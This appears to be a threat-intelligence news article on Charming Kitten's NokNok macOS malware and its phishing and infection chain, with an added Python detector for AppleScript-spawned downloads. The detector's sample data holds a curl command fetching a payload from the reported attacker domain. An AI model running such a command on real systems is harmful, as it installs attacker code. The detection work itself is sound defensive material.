Purr-fectly Crafted for Macs: Charming Kitten Introduces NokNok Malware

Proofpoint has recently detected a fresh campaign believed to be orchestrated by the Charming Kitten APT group, also known as APT42 or Phosphorus. In this campaign, the adversaries employ a novel malware called NokNok, specifically designed to target macOS systems. Notably, the campaign commenced in May and uses a different infection method than the group's earlier operations.

Diving into details

  • The threat actor has made a significant shift in its infection tactics, moving away from macro-based methods that rely on malicious Word documents. Instead, the attackers now use LNK files to execute their payloads.
  • In terms of the campaign's phishing lures and social engineering techniques, the hackers pose as U.S. nuclear experts and approach their targets with an enticing proposition to review drafts concerning foreign policy matters.

Targeting both Windows and Macs

  • In the case of Windows, once Charming Kitten gains the trust of the target, it sends a malicious link containing a Google Script macro.
  • This link redirects the victim to a Dropbox URL. The final payload in this scenario is GorjolEcho, a straightforward backdoor that allows remote operators to send and execute commands.
  • However, if the target is using macOS, the hackers send a different link. This link directs the victim to "library-store[.]camdvr[.]org," which hosts a ZIP file disguised as a RUSI (Royal United Services Institute) VPN app.
  • Upon execution of the AppleScript file found within the archive, a curl command is triggered that fetches the NokNok payload and establishes a backdoor into the victim's macOS system.
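The macOS chain described above (an AppleScript file that spawns curl to fetch the payload) is a useful detection point. The following is an added example, not code from the report or the article: it walks constructed process-creation telemetry (hypothetical field names) and flags a curl or wget process whose parent is osascript, raising severity when the URL host matches the domain named in the report.

```python
import re

# Domain reported in the article (written defanged there), used as an indicator.
KNOWN_C2_HOSTS = {"library-store.camdvr.org"}
DOWNLOADERS = {"curl", "wget"}
URL_RE = re.compile(r"https?://([^/\s:]+)")

# Constructed sample process-creation events; field names, paths and timestamps are
# hypothetical and do not come from the report.
SAMPLE_EVENTS = [
    {"ts": "2023-05-10T14:02:11Z", "pid": 510, "ppid": 1, "image": "/usr/bin/osascript",
     "cmdline": "osascript /Users/analyst/Downloads/RUSI_VPN/Contents/Resources/main.scpt"},
    {"ts": "2023-05-10T14:02:12Z", "pid": 511, "ppid": 510, "image": "/usr/bin/curl",
     "cmdline": "curl -s -o /tmp/payload http://library-store.camdvr.org/payload"},
    {"ts": "2023-05-10T14:05:40Z", "pid": 600, "ppid": 1, "image": "/bin/zsh",
     "cmdline": "zsh"},
    {"ts": "2023-05-10T14:05:41Z", "pid": 601, "ppid": 600, "image": "/usr/bin/curl",
     "cmdline": "curl -sL https://example.com/release.tar.gz -o release.tar.gz"},
]


def _basename(path):
    return path.rsplit("/", 1)[-1]


def detect_script_spawned_downloads(events):
    """Return alerts for curl/wget processes whose parent process is osascript.

    A downloader launched by an interactive shell (the zsh example) is ignored;
    one launched by AppleScript is reported, with 'high' severity when the URL
    host is a known indicator and 'medium' otherwise.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _basename(e["image"]) not in DOWNLOADERS:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _basename(parent["image"]) != "osascript":
            continue
        match = URL_RE.search(e["cmdline"])
        host = match.group(1).lower() if match else ""
        alerts.append({
            "ts": e["ts"], "pid": e["pid"], "host": host,
            "severity": "high" if host in KNOWN_C2_HOSTS else "medium",
            "parent_cmdline": parent["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_script_spawned_downloads(SAMPLE_EVENTS):
        print(alert)
```

The same chain can be expressed as an EDR or Sigma-style rule (parent image ends with osascript, child image is curl or wget); the script only shows the logic on offline data.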

What does NokNok do?

  • After generating a unique system identifier, NokNok uses a set of four bash script modules to establish persistence, communicate with the C2 server, and exfiltrate data to that server.
  • As part of its operations, the malware collects system information such as the operating system version, running processes, and installed applications.
  • NokNok encrypts the collected data and base64-encodes it before exfiltration.

Moreover, Proofpoint suggests that NokNok may contain additional, as yet undisclosed modules with espionage-related functionality. This suspicion arises from code similarities observed with the GhostEcho malware.

The bottom line

Charming Kitten persistently evolves its infection methods to hinder detection efforts and carry out cyberespionage operations against its chosen targets. This campaign underscores the adaptability of the threat actor, as evidenced by its ability to target macOS systems when deemed necessary. It also highlights the escalating threat of sophisticated malware campaigns targeting both macOS and Windows users.

Publisher: Cyware